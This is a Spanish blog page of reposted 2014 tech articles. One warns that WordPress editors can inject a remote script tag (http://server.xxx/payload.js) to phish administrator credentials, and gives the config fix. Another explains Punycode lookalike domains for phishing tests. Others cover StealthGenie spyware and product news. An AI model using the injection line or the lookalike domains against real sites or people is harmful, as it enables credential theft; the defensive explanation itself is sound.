sábado, 4 de octubre de 2014

Cómo robarle las contraseñas a los Administradores de WordPress con XSS haciendo Phishing con Unfiltered HTML

Hace unos días atrás, Juan Manuel Fernández (@TheXC3LL) un amigo del blog, se puso en contacto para contarme una curiosidad que si eres el administrador de un WordPress debes tener presente. Se trata de una configuración por defecto que permite a los administradores y a los editores - y este es el punto importante - inyectar Unfiltered HTML, o lo que es lo mismo. Todo usuario que sea Editor puede incrustar un código Script en cualquier parte de los artículos que esté proponiendo para publicación.

Esto no es ningún fallo de seguridad, sino como bien dicen en las FAQ de Seguridad de WordPress, es una característica que debe estar para que los editores puedan crear el contenido web que deseen, que para algo WordPress se basa en tecnologías web con el objeto de publicar artículos enriquecidos con todo lo que permiten hoy en día.


Figura 1: Explicación de WordPress sobre el asunto de Unfiltered HTML

Sin embargo, dentro de todas las recomendaciones que se dió algún tiempo para Mejorar la Seguridad de WordPress habría que tener también en cuenta esto, ya que cualquier Editor podría inyectar un código JavaScript en distintos puntos y con un un simple "<script src="http://server.xxx/payload.js"></script>" se consigue la ejecución de código en el Dashboard del Admin. Esto podría ser porque el Editor fuera el atacante, o porque previamente un atacante se hubiera hecho con la password de un Editor para luego atacar al Admin, algo similar a como le pasó a Zone-H en el año 2007.


Figura 2: Código Script ejecutado en el dashborad del Admin inyectado por un Editor

Esta característica podría ser ejecutada por un Editor malicioso para ejecutar código para hacer un Phishing y robar las credenciales del administrador mediante un engaño. Así, por ejemplo, el contenido de Payload.js podría ser un código mucho mas elaborado que hiciera que saliera la misma ventana de Login ocultando todo el dashboard, y aprovechándose de los administradores menos duchos en seguridad.


Figura 3: Un Phishing hecho con Payload.js inyectado en el Dashboard del Admin

No solo eso, puestos a robar contraseñas, se podría meter un código script más elaborado que hiciera tabnabbing buscando hacer phishing a otros servicios que elAdmin pudiera tener abiertos, como por ejemplo Gmail. Por supuesto, aunque lascookies de sesión de WordPress sean HTTP-Only, podrían aparecer escenarios en los que fuera posible robarlas, ya que los bugs para encontrar formas de robar cookies HTTP-Only siguen apareciendo y hacer un session hijacking seguiría siendo una posibilidad. Pero al final, lo más peligroso es que cualquier Editor malicioso podría cargar un exploit client-side para obtener una shell de la máquina del Admin, con una vulnerabilidad como el 0day de Internet Explorer que anda circulando o como los exploits de Metasploit para versiones vulnerables de Safari u otros navegadores.

Si gestionas un WordPress, tal vez te convenga tener en cuenta que dentro de wp-config.php se puede deshabilitar esta característica, sobre todo si tienes un numero alto de Editores, añadiendo la línea de configuración define( 'DISALLOW_UNFILTERED_HTML', true ); anótate ésta característica, junto al resto de las recomendadas en el artículo de Fortificar WordPress.


Figura 4: Cómo poner un Plugin de Latch en WordPress

Por supuesto, si quieres evitar que alguien utilice tu contraseña de Admin deWordPress si en algún momento consiguiera robártela, lo mejor es pongas el plugin de Latch para WordPress, así si algún Editor malicioso hiciera un Phishing para robar tu password, tú te enterarías al instante con una alerta de Latch. En el Canal SlideShare de Eleven Paths tienes todos los manuales de instalación de Lath en frameworks de Internet


Fuente

ANDROID L: ASÍ LUCE SU PREVIEW EN EL SAMSUNG GALAXY S5

[​IMG]

Los fans del sistema operativo móvil de Google, llevamos bastante tiempo esperando la llegada de Android L. Poco a poco, hemos podido amenizar la espera con noticias como la descarga de la Android L Developer Preview o la posibilidad de descargar y usar un tema de Android L para ir quitándoos el gusanillo hasta su llegada. Lo cierto es que cada vez queda menos tiempo para la salida oficial de esta versión, y sigue siendo fuente de noticias. De hecho, dedicamos este artículo a ella con motivo de la aparición de imágenes y de vídeo de un Samsung Galaxy S5 corriendo una preview de Android L.



Medios como GSM Arena se han hecho eco de manera reciente de este material, por lo que cualquiera puede verlo y hacerse una idea de lo que espera en base a ello. Eso sí, recuerdan que esa preview de Android L para el Samsung Galaxy S5 está incompleta, faltando trabajo de animaciones y teniendo cuelgues esporádicos. El interés de esta noticia no radica tanto en conocer el aspecto de la inminente versión de Android, porque al fin y al cabo ya hemos tenido ocasión de saber detalles y ver cómo es el estilo Material Design, si no en ir conociendo cómo algunos fabricantes adoptan sus capas de personalización.

Seguramente, la mayoría de vosotros conoce la capa de personalización de Samsung, bien por haber tenido un smartphone de la compañía o bien por haberla podido ver en acción a través de algún amigo o familiar. Su nombre es TouchWiz, y lleva unos cuantos años manteniendo más o menos el mismo aspecto. En esta preview de Android LTouchWiz no sufre un cambio radical, pero sí que cambia algo la estética y colores. Además de eso, también hay que reseñar quelas apps de Samsung se han ido adaptando a Material Design. Por no alargarnos más, os remitimos a que veáis el vídeo para haceros a la idea de la mejor manera posible.


FUENTE

Laneros.com

viernes, 3 de octubre de 2014

Estados Unidos tumba el servicio del troyano StealthGenie

Hace ya un año evaluamos un troyano para espiar Android - también tenía versiones de troyano para iPhone o BlackBerry - llamado StealthGenie. Este fue el que usé para explicar cómo funcionan los troyanos que se usan para espiar en Android la vida y la intimidad de las personas infectadas, pero no quise poner el nombre del mismo en el artículo.


Figura 1: Panel de control de StealthGenie para controlar las llamadas

También fue el mismo que uso 
Chema Alonzo para la demostración en una entrevista que le hicieron en el programa de televisión de Salvados a partir del minuto 9 y 5 segundos.


Figura 2: Entrevista en Salvados. Demo de StealthGenie desde el minuto 9:05

Este troyano permite saber en todo momento dónde está una persona, robar absolutamente todos los datos de las apps del terminal, como espiar WhatsAppSkype, el correo electrónico, Viber, etcétera, e incluso grabar las conversaciones telefónicas o activar el micrófono y usarlo como grabadora bajo el envío de comandos SMS. En Internet es posible encontrar tutoriales de cómo funcionaba Stealthgenie.


Figura 3: Vídeo Tutorial del funcionamiento de StealthGenie

Los servidores del panel de control de este troyano se encontraban en Amazon Web Services, en el estado de Virginia (USA) y el gobierno de Estados Unidos ha actuado con una acusación formal contra la empresa y el dueño de la misma, de origen pakistaní. La acusación formal ha sido puesta en Internet y se puede leer completamente.

Figura 4: Acusación formal al CEO de StealthGenie

En ella se deba claro que se le acusa de ciber-crímenes y se ha procedido a tirar abajo los servidores que estaban en Amazon, por lo que se ha descabezado temporalmente a todas los espías que se han quedado sin forma de poder utilizar este troyano.

Figura 5: Argumentos iniciales de la acusación.

Por desgracia, no es este el único troyano que se comercializa para espiar iPhone o Android, y por supuesto, los creadores de StealthGenie solo moverán sus servidores a otra ubicación menos controlada para volver a empezar de cero, así que ten mucho cuidado con tu terminal, no sea que quién menos te lo esperes te esté espiando y controlando.


Fuente

Ataques de Phishing con código Punycode: This is Espaarta

Cuando hemos tenido que hacer algún test de intrusión con una prueba de phishing a una compañía para testear cuantos de sus empleados están preparados contra un ataque dirigido - del mismo modo que nos contaba hace poco un amigo con la prueba de phishing que hizo en su propia empresa  - no hemos escatimado en la compra del dominio más adecuado para que el ataque fuera más creíble.

Figura 1: Dominios de phishing visualmente similares con PunyCode

Para ello se compra un nombre de dominio que sea visualmente similar y se monta en él es servicio de prueba. Los trucos habituales es jugar con la representación visual de los dominios, por ejemplo cambiando letras similares como la I "i mayúscula" y la l "l minúscula" que dan bastante juego. Con ellas es fácil visualmente engañar al usuario en la barra de direcciones, que puede creer que está en linkedin cuando realmente está en Iinkedin.

Figura 2: En ese dominio la "ele" es una "i mayúscula"

Uno de los trucos que se pueden utilizar para esto son los nombres de dominios internazionalizados codificados en Punycode, donde se permiten cosas comoLïnkedin o Linkédin o Linkedîn, que a unos ojos cansados o no acostumbrados a fijarse en los detalles puede colar fácilmente. En el ejemplo que me pasó un compañero de Eleven Paths se puede un nombre de una web en la que se ha utilizado una tilde en el nombre fideuá, [que luego en la web se han saltado, ironías de la vida].

Figura 3: El dominio fideuá.net con tilde en la a

Estos nombres de dominio siguen un formato de codificación bastante curioso, ya  que utilizan un prefijo que comienza por xn- y termina con un sufijo que va indicando en qué posición se deben ir insertando los caracteres extendidos y qué caracteres van incrustados. Para que sea mucho más fácil, puedes utilizar algún conversor en la web, como este Conversor Unicode-PunyCode que te permite ver cuál sería la codificación de algunos dominios como hötmail.com oelévenpaths.com.

Figura 4: Codificación Punycode de hötmail

Figura 5: Codificación Punycode de elévenpaths

Si vas a hacer alguna prueba de phishing contra tu empresa, seguro que se te ocurren algunos nombres curiosos para hacer la prueba, donde puedes utilizar hasta la ñ en el ataque. Por ejemplo, para poner un dominio con españa, la codificación sería la que ves.

Figura 6: Códificación punycode de españa

Ya sabes, en la guerra del phishing el sentimiento que hay que tener es que te la pueden hacer en cualquier sitio, ya que como has visto Esto es xn-espaa-rta!.


Los desarrolladores "full stack" son los que se encargan o al menos tienen una amplia visión de todas las capas que componen un proyecto: servidor y entorno de red, modelado de datos, lógica de negocio, APIs, interfaces de usuario, etc. 

Digamos que son unos "todo-terreno" que saben juntar la piezas y entienden el funcionamiento del "puzzle", capaces inclusos de montar un servicio o aplicación completo (sobretodo en PYMES y en ciertos entornos). Para ellos y para el resto seguro que vendrá de perlas todas esta colección de cheatsheets que encontré en ídíot ínsíde:

C# 

C 
 C++ 
 
CSS 

 Action script 
 PHP 
 Python 
 Ruby 
 Javascript 
 Java 
 jQuery 
 MySQL 
 Perl 
 HTML/XHTML 
 WordPress 

miércoles, 1 de octubre de 2014

Ya puedes descargar el Preview de Windows 10


[​IMG] 

Todavía quedan meses hasta que Windows 10 llegue a todos los ordenadores, pero si eres desarrollador y no puedes esperar a ver cómo funciona el nuevo sistema operativo ya puedes descargar la primera beta. Microsoft acaba de hacer públicos los archivos de la primera beta Technical Preview en su página web. Eso sí, para descargarla hay que cumplir los requisitos e inscribirse en el Windows Insider Program.

El programa Insider es nuevo en Windows, y permitirá a los usuarios inscritos en él recibir automáticamente las actualizaciones a medida que los ingenieros de Windows 10 vayan completando la plataforma. Los requisitos técnicos que Microsoft apunta en su página de descarga para poder instalar la previa son:


  • Procesador: 1 gigahercio (GHz) o más rápido.
  • RAM: 1 gigabyte (GB) (32 bits) o 2 GB (64 bits).
  • Espacio disponible en el disco duro: 16 GB.
  • Tarjeta gráfica: dispositivo gráfico Microsoft DirectX 9 con controlador WDDM.
  • Una cuenta Microsoft y acceso a Internet.
También hay que tener en cuenta que, de momento, el software solo está disponible en inglés, chino y portugués de Brasil. En esta web la compañía explica detalladamente (en español) los requisitos de la descarga y los problemas que puede dar. No hay que olvidar que Windows 10 está en una versión extremadamente temprana, y los problemas técnicos van a aparecer por docenas.

Como siempre, es totalmente recomendable hacer una copia de seguridad de nuestro sistema antes de instalar una beta de este tipo. Por si acaso, Microsoft explica una forma de volver a nuestro sistema operativo anterior. La beta también tiene fecha de caducidad: 15 de abril de 2015. [Windows Technical Preview vía The Verge]


Fuente

iPhone 6 & 6 Plus, iOS 8.algo, el Bendgate, el Celebgate, el Watch, el Pay, las colas y todos los líos de Apple

Sin duda este pasado mes de Septiembre si hay una empresa tecnológica que ha copado, "wows""ays""tomas""uffes" y "joderes" ha sido la de la manzana mordida: Apple.  Un mes en el que la empresa no ha parado de tener guerras en los medios, lo que deja claro que estar en el equipo de comunicación y prensa debe ser de todo menos relajado.

Figura 1: La víde de trabajar en el departamento de Press Relationships de Apple

CelebGate

Este mes estuvo marcado, sin duda, por el Celebgate. Un escándalo provocado por la publicación 4Chan de una colección de fotos robadas en paños menos - y a veces en ausencia de dichos paños - de famosas que habían sido sacadas de sus backups de iCloud. Entre los fallos de Apple y la facilidad de hacer ataques dirigidos a las famosas, parece que al final la responsabilidad era divida entre fallos de seguridad en iCloud - alguno conocido hasta con más de seis meses de anterioridad por Apple - y las famosas que pusieron sus passwords con ligereza.


Figura 2: Demo de cómo bajar fotos de iCloud con un robo por Phishing

Esto no pararía durante todo el mes, y ayer mismo hubo la tercera oleada de fotos robadas a famosas, con nuevas instantáneas de la vida privada que aparecieron en la red. Además, ha habido que sumar otro cosa similar en España, donde otro coleccionista hacía algo similar con famosas españolas y fue detenido en Córdoba

El iPhone 6 y el iPhone 6 Plus

Durante la primera quincena del mes, Apple tuvo su keynote de presentación de nuevos productos, donde para conseguir mantener la expectación y que no se filtrara ni una sola fotografía en la red, a todo el personal que entraba y salía en el evento se le censuró la cámara del smartphone con una pegatina que cambiaba de color si era despegada por el contacto con el aire. Si la pegatina tenía ese color, entonces no podría salir ese smartphone hasta después del evento.


Figura 3: iPhone 4/4S, iPhone 5/5S/5C, iPhone 6 & iPhone 6 Plus. Hazte una idea.

En él se anunció el iPhone 6 grandote y el iPhone 6 aún más grandote. Este último sobre todo, ya que por mucho que insistan en decir que es un smartphone, la cosa tira más a phablet que a otra cosa, que cuando he estado jugando con él ha sido casi imposible tenerlo en las manos y manejarlo con una sola. Eso sí, la posibilidad de grabar en Full HD con el iPhone 6 más grandote ha atraído a los aficionados del vídeo amateur. Y es que como ha cambiado iPhone, desde aquel iPhone Original que era un dispositivo para escuchar música, hacer llamadas y navegar por Internet y que no permitía ni grabar vídeo. Ya veras que, ahora habrá avalancha de CelebGate con vídeos en HD, para que quede toda la intimidad bien documentada. Id comprando palomitas.

Lo mejor de todo en los mentideros de las redes sociales, sin duda, fue ver caer el iPhone 6 plus del primer comprador nada más sacarlo de su caja. Trending Tronching en la red, que diría Leo Harlem, cuando todo el mundo pensó a la vez lo mismo. Si ya hubiéramos desarrollado la telequinesis como forma de comunicación de nuestra especie, seguro que le habría llegado un D.o.S. con un mismo pensamiento global.



Figura 4: Vídeo del primer iPhone 6 cayendo

Y es que los iPhone grandotes en su lanzamiento se han vendido como rosquillas e incluso en países acosados por la crisis pusieron el sold-out de ambos modelos durante el primer día. Bueno, no del todo, si te pateabas las tiendas en España podías llegar a conseguir el iPhone 6 de 16GB, es decir, el más pequeño. Claro está que, teniendo un sistema operativo iOS que ocupa ya unos cuantos de Gigabytes, y teniendo en cuenta que las actualizaciones del sistema ocupan otro puñado de Gigabytes cada vez que salen, tener uno con 16Gb es pasarse todo el tiempo borrando los vídeos que has grabado, quitando las apps que has descargado y contando los megas que has liberado para poder aplicar el parche.

El CDNGate de la Keynote

Si te conectaste a ver el evento en streaming verías que no iba muy allá, y es que a la hora de montar la CDN (Contente Delivery Network) para la distribución del streaming de vídeo lo echaron a perder. Parece ser que no distribuyeron el tráfico correctamente y todos los usuarios eran enviados al mismo punto de distribución, además de que el diseño de la página no fue muy acertado, al meter el streaming social en la misma web y pedir la actualización cada muy poco de todo el hilo. Un fallo de sistemas gordo que hizo que las críticas a la retransmisión fueran muchas. 

El bendgate

Eso sí, otra de las crisis de media en Apple fue el famoso "se me ha doblado el iPhone 6 Plus", un escándalo donde los compradores del smartphablet se quejaban de que sin quererlo podrían ver el vídeo en Full HD y con pantalla curva, lo que llevó a Apple a tener que responder a las quejas.

Figura 5: Un iPhone 6 Plus doblado de uno de los que se quejó

Nueve dijo la compañía que fueron los clientes que presentaron quejas de esto, y para demostrar que sus pruebas de QA de hardware son robustas, publicaron vídeos de cómo retuercen los dispositivos para medir su grado de resistencia en la vida real dentro de los bolsillos de los humanos más difíciles.



Figura 6: Test de resistencia en iPhone

De nuevo, lo mejor en la red fueron los chistes, y, como no, los trolleos de otras marcas que aprovecharon el hashtag para hacer su trending topic y pescar followers. Algunos muy trabajados.

Figura 7: El Bendgate visto por Heineken

El iOS 8.algo

Y es que en cuanto actualizaciones la cosa ha sido, cuanto menos, movidita. La cosa comenzó con el lanzamiento de iOS 8 con los nuevos teléfonos y una actualización masiva para todos los terminales soportados, es decir, el iPhone 5, el iPhone 5S, el iPhone 5C - si hombre, ese de colores que llevan los que no podían comprarse el iPhone 5S (o eso dicen) - el iPhone 6, y los iPod Touch, iPad Air, iPad mini y Apple TV ... y algo más que seguro que me dejo. Esa actualización eran unos 4Gb de nada que obligaba a limpiar cosas y hacer hueco.

Pero, con la actualización de iOS 8 la cosa se empezó a torcer con un buen montón de bugs de gente que se quejaba de que le dejaba de funciona el Touch ID, que se comía la batería, bugs de crasheos varios, etcétera. Por suerte, aún se podía descender la versión a la iOS 7.1.2, así que se promocionó el manual del downgrade para los más descontentos y se empezó a trabajar con urgencia en la iOS 8.0.1, que salió la semana pasada.

Figura 8: Bug en iOS 8.0.1 no permite hacer llamadas

Con la versión iOS 8.0.1 se cepillaron del smartphone la parte de phone en muchos de los terminales, así que hubo que abortar a lo bestia. Se paró la distribución de iOS 8.0.1 y se lanzó un procedimiento de downgrade a la iOS 8.0, al tiempo que se cancelaba el downgrade a la iOS 7.1.2, por lo que ya estabas en iOS 8 sí o sí. Por supuesto, al día siguiente ya había nueva actualización a la iOS 8.0.2 que solucionaba el bug ese de poder llamar por teléfono. Eso sí, por el camino restablecieron las preferencias de iCloud y se cepillaron montones de documentos de lo usuarios. Ouch!

Cada vez que llega una de esas actualizaciones, ya sabes, gigabytes van, gigabytes vienen para instalar en tus terminales, y un poco de tiempo para ello, lo que no deja muy contento a los usuarios pero.. como aún no va fino, ya se está preparando la versión iOS 8.1 que parece que va a llegar a nuestras manos junto a los nuevos iPad Air & iPad Mini que van a ser lanzados este mes. 

El Pay y el Watch

Las novedades que Apple presentó, dejando al margen a los iPhone grandotes y el iOS 8. algo de los que se sabía prácticamente todo con anterioridad, fue el poder pagar con Apple Pay - merced a la integración con NFC, los acuerdos con compañías de medios de pago y la distribución de dispositivos de pago por las principales tiendas de USA - y el reloj. El Apple Watch, cuyo objetivo es meterse en el mundo de la moda y los amantes de los relojes, por lo que se aleja mucho del formato de smartwatches que teníamos hasta el momento.

Lo habrá hasta hecho en oro, por eso de satisfacer a los amantes del "colorao" que ahora podrán usar Apple Pay con un giro de muñeca. Eso sí, con una protección basada en un sensor de muñeca que detecta si te han quitado el reloj. Aún no están a la venta, pero seguro que los van a vender como churros para llenar aún más las arcas de la empresa.

Figura 9: El Apple Watch de colorado

Como era de esperar, la preocupación popular fue si Apple tendría ahora también la información de los pagos y los datos de salud de sus compradores al ponerse el reloj, por lo que el equipo de comunicaciones tuvo que salir a la palestra para decir esa frase de "Nosotros vendemos grandes productos (y caros, se olvidaron de decir), no tus datos".

Ha sido un mes muy movido para la compañía, pero aun queda octubre con el nuevo OSX Yosemite, los nuevos tablets y los nuevos escándalos, que está claro que esta compañía ahora mueve el mundo de la tecnología junto a Google y pocas más. Y es que hasta un hecho tan de buena voluntad, como regalar a todo el mundo el nuevo disco de U2 generó polémica, ya que muchos usuarios pidieron poder borrarlo y Apple tuvo que sacar una herramienta para hacerlo. Ah, sí, y al final tambiénparchearon ShellShock este mes para los sistemas operativos con soporte. ¿Es o no es interesante seguir el mundo de la tecnología con Apple de por medio?